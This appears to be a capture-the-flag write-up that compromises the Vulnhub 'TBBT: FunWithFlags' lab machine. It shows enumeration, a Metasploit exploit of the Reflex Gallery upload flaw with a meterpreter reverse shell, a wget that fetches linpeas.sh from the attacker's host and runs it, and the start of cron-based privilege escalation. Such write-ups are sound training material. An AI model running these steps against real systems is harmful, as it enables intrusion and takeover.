TBBT FunWithFlags
Author: jason_huawen
Target machine information
Name: TBBT: FunWithFlags
URL:
https://www.vulnhub.com/entry/tbbt-funwithflags,437/
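Other notes: the target machine is configured with a static IP address, so the Kali Linux network interface must be given an address on the same subnet.
NMAP scan
Run a full-port scan against the target host with NMAP: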
┌──(kali㉿kali)-[~/Vulnhub/TBBT]
└─$ sudo nmap -sS -sV -sC -p- 192.168.1.105 -oN nmap_full_scan
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-11 20:27 EST
Nmap scan report for bogon (192.168.1.105)
Host is up (0.00019s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 539 Mar 04 2020 Welcome.txt
| -rw-r--r-- 1 ftp ftp 114 Mar 04 2020 ftp_agreement.txt
|_drwxr-xr-x 9 ftp ftp 4096 Mar 04 2020 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.200
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 cf:5c:ee:76:7c:48:52:06:8d:56:07:7f:f6:5d:80:f2 (RSA)
| 256 ab:bb:fa:f9:89:99:02:9e:e4:20:fa:37:4f:6f:ca:ca (ECDSA)
|_ 256 ea:6d:77:f3:ff:9c:d5:dd:85:e3:1e:75:3c:7b:66:47 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 4 disallowed entries
|_/howard /web_shell.php /backdoor /rootflag.txt
|_http-title: Fun with flags!
|_http-server-header: Apache/2.4.18 (Ubuntu)
1337/tcp open waste?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|_ FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:67:0D:48 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.31 seconds
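The NMAP results show that the target host has 4 open ports: 21 (FTP), 22 (SSH), 80 (HTTP) and 1337 (?)
Getting a shell
Start collecting and analysing information from the FTP service: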
┌──(kali㉿kali)-[~/Vulnhub/TBBT]
└─$ ftp 192.168.1.105
Connected to 192.168.1.105.
220 (vsFTPd 3.0.3)
Name (192.168.1.105:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp> ls
229 Entering Extended Passive Mode (|||45119|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 539 Mar 04 2020 Welcome.txt
-rw-r--r-- 1 ftp ftp 114 Mar 04 2020 ftp_agreement.txt
drwxr-xr-x 9 ftp ftp 4096 Mar 04 2020 pub
226 Directory send OK.
ftp> get Welcome.txt
local: Welcome.txt remote: Welcome.txt
229 Entering Extended Passive Mode (|||44749|)
150 Opening BINARY mode data connection for Welcome.txt (539 bytes).
100% |********************************************************************************| 539 1.00 MiB/s 00:00 ETA
226 Transfer complete.
539 bytes received in 00:00 (532.22 KiB/s)
ftp> get ftp_agreement.txt
local: ftp_agreement.txt remote: ftp_agreement.txt
229 Entering Extended Passive Mode (|||46655|)
150 Opening BINARY mode data connection for ftp_agreement.txt (114 bytes).
100% |********************************************************************************| 114 238.90 KiB/s 00:00 ETA
226 Transfer complete.
114 bytes received in 00:00 (126.36 KiB/s)
ftp> cd pub
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||49507|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 amy
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 bernadette
drwxr-xr-x 2 ftp ftp 4096 Mar 06 2020 howard
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 leonard
drwxr-xr-x 2 ftp ftp 4096 Mar 05 2020 penny
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 raj
-rw-r--r-- 1 ftp ftp 297410 Mar 04 2020 roomate_agreement.jpg
-rw-r--r-- 1 ftp ftp 3348 Mar 04 2020 roomate_agreement.txt
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 sheldon
226 Directory send OK.
ftp> ls -alh
229 Entering Extended Passive Mode (|||42238|)
150 Here comes the directory listing.
drwxr-xr-x 9 ftp ftp 4096 Mar 04 2020 .
drwxr-xr-x 3 ftp ftp 4096 Mar 04 2020 ..
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 amy
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 bernadette
drwxr-xr-x 2 ftp ftp 4096 Mar 06 2020 howard
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 leonard
drwxr-xr-x 2 ftp ftp 4096 Mar 05 2020 penny
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 raj
-rw-r--r-- 1 ftp ftp 297410 Mar 04 2020 roomate_agreement.jpg
-rw-r--r-- 1 ftp ftp 3348 Mar 04 2020 roomate_agreement.txt
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 sheldon
226 Directory send OK.
ftp> cd amy
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||40923|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 .
drwxr-xr-x 9 ftp ftp 4096 Mar 04 2020 ..
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> cd bernadette
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||44833|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 .
drwxr-xr-x 9 ftp ftp 4096 Mar 04 2020 ..
-rw-r--r-- 1 ftp ftp 340 Mar 04 2020 PENNY_README_ASAP.txt
226 Directory send OK.
ftp> get PENNY_README_ASAP.txt
local: PENNY_README_ASAP.txt remote: PENNY_README_ASAP.txt
229 Entering Extended Passive Mode (|||47232|)
150 Opening BINARY mode data connection for PENNY_README_ASAP.txt (340 bytes).
100% |********************************************************************************| 340 709.46 KiB/s 00:00 ETA
226 Transfer complete.
340 bytes received in 00:00 (368.51 KiB/s)
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||40488|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 amy
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 bernadette
drwxr-xr-x 2 ftp ftp 4096 Mar 06 2020 howard
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 leonard
drwxr-xr-x 2 ftp ftp 4096 Mar 05 2020 penny
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 raj
-rw-r--r-- 1 ftp ftp 297410 Mar 04 2020 roomate_agreement.jpg
-rw-r--r-- 1 ftp ftp 3348 Mar 04 2020 roomate_agreement.txt
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 sheldon
226 Directory send OK.
ftp> cd howard
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||49126|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 06 2020 .
drwxr-xr-x 9 ftp ftp 4096 Mar 04 2020 ..
-rw-r--r-- 1 ftp ftp 273 Mar 04 2020 note.txt
-rw-r--r-- 1 ftp ftp 30762 Mar 06 2020 super_secret_nasa_stuff_here.zip
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||40129|)
150 Opening BINARY mode data connection for note.txt (273 bytes).
100% |********************************************************************************| 273 539.67 KiB/s 00:00 ETA
226 Transfer complete.
273 bytes received in 00:00 (254.63 KiB/s)
ftp> get super_secret_nasa_stuff_here.zip
local: super_secret_nasa_stuff_here.zip remote: super_secret_nasa_stuff_here.zip
229 Entering Extended Passive Mode (|||48503|)
150 Opening BINARY mode data connection for super_secret_nasa_stuff_here.zip (30762 bytes).
100% |********************************************************************************| 30762 28.15 MiB/s 00:00 ETA
226 Transfer complete.
30762 bytes received in 00:00 (20.82 MiB/s)
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||48065|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 amy
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 bernadette
drwxr-xr-x 2 ftp ftp 4096 Mar 06 2020 howard
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 leonard
drwxr-xr-x 2 ftp ftp 4096 Mar 05 2020 penny
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 raj
-rw-r--r-- 1 ftp ftp 297410 Mar 04 2020 roomate_agreement.jpg
-rw-r--r-- 1 ftp ftp 3348 Mar 04 2020 roomate_agreement.txt
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 sheldon
226 Directory send OK.
ftp> cd leonard
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||45378|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 .
drwxr-xr-x 9 ftp ftp 4096 Mar 04 2020 ..
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> cd penny
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||48884|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 05 2020 .
drwxr-xr-x 9 ftp ftp 4096 Mar 04 2020 ..
-rw-r--r-- 1 ftp ftp 89 Mar 05 2020 todolist.txt
-rw-r--r-- 1 ftp ftp 113 Mar 04 2020 wifi_password.txt
226 Directory send OK.
ftp> get todolist.txt
local: todolist.txt remote: todolist.txt
229 Entering Extended Passive Mode (|||42981|)
150 Opening BINARY mode data connection for todolist.txt (89 bytes).
100% |********************************************************************************| 89 175.93 KiB/s 00:00 ETA
226 Transfer complete.
89 bytes received in 00:00 (100.24 KiB/s)
ftp> get wifi_password.txt
local: wifi_password.txt remote: wifi_password.txt
229 Entering Extended Passive Mode (|||43493|)
150 Opening BINARY mode data connection for wifi_password.txt (113 bytes).
100% |********************************************************************************| 113 257.83 KiB/s 00:00 ETA
226 Transfer complete.
113 bytes received in 00:00 (123.71 KiB/s)
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||47753|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 amy
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 bernadette
drwxr-xr-x 2 ftp ftp 4096 Mar 06 2020 howard
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 leonard
drwxr-xr-x 2 ftp ftp 4096 Mar 05 2020 penny
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 raj
-rw-r--r-- 1 ftp ftp 297410 Mar 04 2020 roomate_agreement.jpg
-rw-r--r-- 1 ftp ftp 3348 Mar 04 2020 roomate_agreement.txt
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 sheldon
226 Directory send OK.
ftp> cd r
raj roomate_agreement.jpg roomate_agreement.txt
ftp> cd raj
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||49175|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -alh
229 Entering Extended Passive Mode (|||46798|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 .
drwxr-xr-x 9 ftp ftp 4096 Mar 04 2020 ..
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||45711|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 amy
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 bernadette
drwxr-xr-x 2 ftp ftp 4096 Mar 06 2020 howard
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 leonard
drwxr-xr-x 2 ftp ftp 4096 Mar 05 2020 penny
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 raj
-rw-r--r-- 1 ftp ftp 297410 Mar 04 2020 roomate_agreement.jpg
-rw-r--r-- 1 ftp ftp 3348 Mar 04 2020 roomate_agreement.txt
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 sheldon
226 Directory send OK.
ftp> get roomate_agreement.jpg
local: roomate_agreement.jpg remote: roomate_agreement.jpg
229 Entering Extended Passive Mode (|||48710|)
150 Opening BINARY mode data connection for roomate_agreement.jpg (297410 bytes).
100% |********************************************************************************| 290 KiB 79.96 MiB/s 00:00 ETA
226 Transfer complete.
297410 bytes received in 00:00 (71.66 MiB/s)
ftp> get r
raj roomate_agreement.jpg roomate_agreement.txt
ftp> get roomate_agreement.txt
local: roomate_agreement.txt remote: roomate_agreement.txt
229 Entering Extended Passive Mode (|||47294|)
150 Opening BINARY mode data connection for roomate_agreement.txt (3348 bytes).
100% |********************************************************************************| 3348 7.39 MiB/s 00:00 ETA
226 Transfer complete.
3348 bytes received in 00:00 (3.73 MiB/s)
ftp> cd sheldon
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||42478|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -alh
229 Entering Extended Passive Mode (|||40997|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 .
drwxr-xr-x 9 ftp ftp 4096 Mar 04 2020 ..
226 Directory send OK.
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/TBBT]
└─$ ls
ftp_agreement.txt note.txt roomate_agreement.jpg super_secret_nasa_stuff_here.zip Welcome.txt
nmap_full_scan PENNY_README_ASAP.txt roomate_agreement.txt todolist.txt wifi_password.txt
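The target's FTP server holds quite a few files. They were downloaded to the local Kali Linux machine, but none of them gave an immediate breakthrough, and cracking the password with john seemed to have problems: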
┌──(kali㉿kali)-[~/Vulnhub/TBBT]
└─$ ls
ftp_agreement.txt nmap_full_scan PENNY_README_ASAP.txt roomate_agreement.txt todolist.txt wifi_password.txt
hashes note.txt roomate_agreement.jpg super_secret_nasa_stuff_here.zip Welcome.txt
Next, look at port 80:
┌──(kali㉿kali)-[~/Vulnhub/TBBT]
└─$ curl http://192.168.1.105/robots.txt
User-Agent: *
Disallow:
Disallow: /howard
Disallow: /web_shell.php
Disallow: /backdoor
Disallow: /rootflag.txt
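Requests for /web_shell.php, /backdoor and /rootflag.txt either return not found or come back with no content, so these are perhaps traps left by the box's author. Scan for other usable directories or files instead: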
┌──(kali㉿kali)-[~/Vulnhub/TBBT]
└─$ gobuster dir -u http://192.168.1.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.105
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/11 21:07:30 Starting gobuster in directory enumeration mode
===============================================================
/music (Status: 301) [Size: 314] [--> http://192.168.1.105/music/]
/private (Status: 301) [Size: 316] [--> http://192.168.1.105/private/]
/javascript (Status: 301) [Size: 319] [--> http://192.168.1.105/javascript/]
/phpmyadmin (Status: 301) [Size: 319] [--> http://192.168.1.105/phpmyadmin/]
/howard (Status: 301) [Size: 315] [--> http://192.168.1.105/howard/]
/server-status (Status: 403) [Size: 301]
Progress: 218851 / 220561 (99.22%)===============================================================
2022/12/11 21:08:01 Finished
Continue by scanning the target host's directories with dirb:
┌──(kali㉿kali)-[~/Vulnhub/TBBT]
└─$ dirb http://192.168.1.105
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Dec 11 21:08:09 2022
URL_BASE: http://192.168.1.105/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.105/ ----
+ http://192.168.1.105/index.html (CODE:200|SIZE:239)
==> DIRECTORY: http://192.168.1.105/javascript/
==> DIRECTORY: http://192.168.1.105/music/
==> DIRECTORY: http://192.168.1.105/phpmyadmin/
==> DIRECTORY: http://192.168.1.105/private/
+ http://192.168.1.105/robots.txt (CODE:200|SIZE:112)
+ http://192.168.1.105/server-status (CODE:403|SIZE:301)
---- Entering directory: http://192.168.1.105/javascript/ ----
==> DIRECTORY: http://192.168.1.105/javascript/jquery/
---- Entering directory: http://192.168.1.105/music/ ----
+ http://192.168.1.105/music/index.html (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.105/music/wordpress/
dirb found a WordPress site on the target host; scan it with wpscan:
┌──(kali㉿kali)-[~/Vulnhub/TBBT]
└─$ wpscan --url http://192.168.1.105/music/wordpress/ -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.1.105/music/wordpress/ [192.168.1.105]
[+] Started: Sun Dec 11 21:10:09 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.1.105/music/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.1.105/music/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Registration is enabled: http://192.168.1.105/music/wordpress/wp-login.php?action=register
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.1.105/music/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.1.105/music/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.1.105/music/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
| - http://192.168.1.105/music/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
[+] WordPress theme in use: twentytwenty
| Location: http://192.168.1.105/music/wordpress/wp-content/themes/twentytwenty/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://192.168.1.105/music/wordpress/wp-content/themes/twentytwenty/readme.txt
| [!] The version is out of date, the latest version is 2.1
| Style URL: http://192.168.1.105/music/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.1
| Style Name: Twenty Twenty
| Style URI: https://wordpress.org/themes/twentytwenty/
| Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.1.105/music/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.1, Match: 'Version: 1.1'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] reflex-gallery
| Location: http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/
| Last Updated: 2021-03-10T02:38:00.000Z
| [!] The version is out of date, the latest version is 3.1.7
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 3.1.3 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/readme.txt
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] footprintsonthemoon
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.1.105/music/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] stuart
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] kripke
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Dec 11 21:10:12 2022
[+] Requests Done: 59
[+] Cached Requests: 6
[+] Data Sent: 16.633 KB
[+] Data Received: 528.084 KB
[+] Memory used: 239.219 MB
[+] Elapsed time: 00:00:03
wpscan identified the users and also a vulnerable plugin on the target site, reflex-gallery. Exploit it with the corresponding Metasploit module:
msf6 > search reflex
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/wp_reflexgallery_file_upload 2012-12-30 excellent Yes Wordpress Reflex Gallery Upload Vulnerability
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_reflexgallery_file_upload
msf6 > use exploit/unix/webapp/wp_reflexgallery_file_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > show options
Module options (exploit/unix/webapp/wp_reflexgallery_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Reflex Gallery 3.1.3
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set RHOSTS 192.168.1.105
RHOSTS => 192.168.1.105
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set TARGETURI /music/wordpress
TARGETURI => /music/wordpress
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LHOST 192.168.1.200
LHOST => 192.168.1.200
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > exploit
[*] Started reverse TCP handler on 192.168.1.200:5555
[+] Our payload is at: YaESnrXVH.php. Calling payload...
[*] Calling payload...
[*] Sending stage (39927 bytes) to 192.168.1.105
[+] Deleted YaESnrXVH.php
[*] Meterpreter session 1 opened (192.168.1.200:5555 -> 192.168.1.105:44850) at 2022-12-11 21:15:00 -0500
id
meterpreter > id
[-] Unknown command: id
meterpreter > shell
Process 2321 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@tbbt:/var/www/html/music/wordpress/wp-content/uploads/2022/12$ cd /home
</music/wordpress/wp-content/uploads/2022/12$ cd /home
www-data@tbbt:/home$ ls -alh
ls -alh
total 40K
drwxr-xr-x 10 root root 4.0K Mar 4 2020 .
drwxr-xr-x 22 root root 4.0K Mar 3 2020 ..
drwxr-xr-x 4 amy amy 4.0K Mar 6 2020 amy
drwxr-xr-x 2 bernadette bernadette 4.0K Mar 6 2020 bernadette
drwxr-xr-x 4 funwithflags funwithflags 4.0K Mar 6 2020 funwithflags
drwxr-xr-x 3 howard howard 4.0K Mar 6 2020 howard
drwxr-xr-x 2 leonard leonard 4.0K Mar 6 2020 leonard
drwxr-xr-x 4 penny penny 4.0K Mar 6 2020 penny
drwxr-xr-x 2 raj raj 4.0K Mar 4 2020 raj
drwxr-xr-x 3 sheldon sheldon 4.0K Mar 4 2020 sheldon
www-data@tbbt:/home$
Privilege escalation
www-data@tbbt:/home/amy$ cat secretdiary
cat secretdiary
www-data@tbbt:/home/amy$ ls
ls
notes.txt secretdiary
www-data@tbbt:/home/amy$ ^Z
Background channel 0? [y/N] y
meterpreter > download secretdiary
[-] stdapi_fs_stat: Operation failed: 1
meterpreter > pwd
/var/www/html/music/wordpress/wp-content/uploads/2022/12
meterpreter > cd /home/amy
meterpreter > download secretdiary
[*] Downloading: secretdiary -> /home/kali/Vulnhub/TBBT/secretdiary
[*] Downloaded 7.31 KiB of 7.31 KiB (100.0%): secretdiary -> /home/kali/Vulnhub/TBBT/secretdiary
[*] download : secretdiary -> /home/kali/Vulnhub/TBBT/secretdiary
meterpreter >
└─$ strings secretdiary
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
__isoc99_scanf
puts
__stack_chk_fail
strcmp
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.0
PTRh`
UWVS
t$,U
[^_]
Enter your username:
Enter your password:
P@SSw0rd123Sh3ld0n
Login Success!
Soon I will be adding my secrets here..
FLAG-amy{60263777358690b90e8dbe8fea6943c9}
Wrong password! YOY WILL NEVER READ MY SECRETS
User doesn't exist
;*2$"(
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.7209
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
secretdiary.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
strcmp@@GLIBC_2.0
_ITM_deregisterTMCloneTable
__x86.get_pc_thunk.bx
_edata
__stack_chk_fail@@GLIBC_2.4
__data_start
puts@@GLIBC_2.0
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_start_main@@GLIBC_2.0
__libc_csu_init
_fp_hw
__bss_start
main
_Jv_RegisterClasses
__isoc99_scanf@@GLIBC_2.7
__TMC_END__
_ITM_registerTMCloneTable
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment
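This reveals a password, P@SSw0rd123Sh3ld0n, but it is not clear which username it belongs to.
Upload the linpeas.sh script to the /tmp directory on the target host, make it executable and run it. From the script's output: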
www-data@tbbt:/home$ cd /tmp
cd /tmp
www-data@tbbt:/tmp$ wget http://192.168.1.200:8000/linpeas.sh
wget http://192.168.1.200:8000/linpeas.sh
--2022-12-12 04:23:45-- http://192.168.1.200:8000/linpeas.sh
Connecting to 192.168.1.200:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765823 (748K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 747.87K --.-KB/s in 0.003s
2022-12-12 04:23:45 (225 MB/s) - 'linpeas.sh' saved [765823/765823]
www-data@tbbt:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@tbbt:/tmp$ ./linpeas.sh
./linpeas.sh
linpeas-ng by carlospolop
The following part of the output stands out:
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/1 * * * * root /home/leonard/thermostat_set_temp.py
www-data@tbbt:/home/leonard$ cat thermostat_set_temp.sh
cat thermostat_set_temp.sh
#!/bin/bash
# This script is empty for now, I will code it as soon as I have free time.
# This script will secretly connect to our IoT thermostat and always set the
# temperature in the value I wish overiding Sheldons' settings without him even knowing.
# Even if Sheldon changes the value my script is already configured to run every minute
# and change the value again and again!
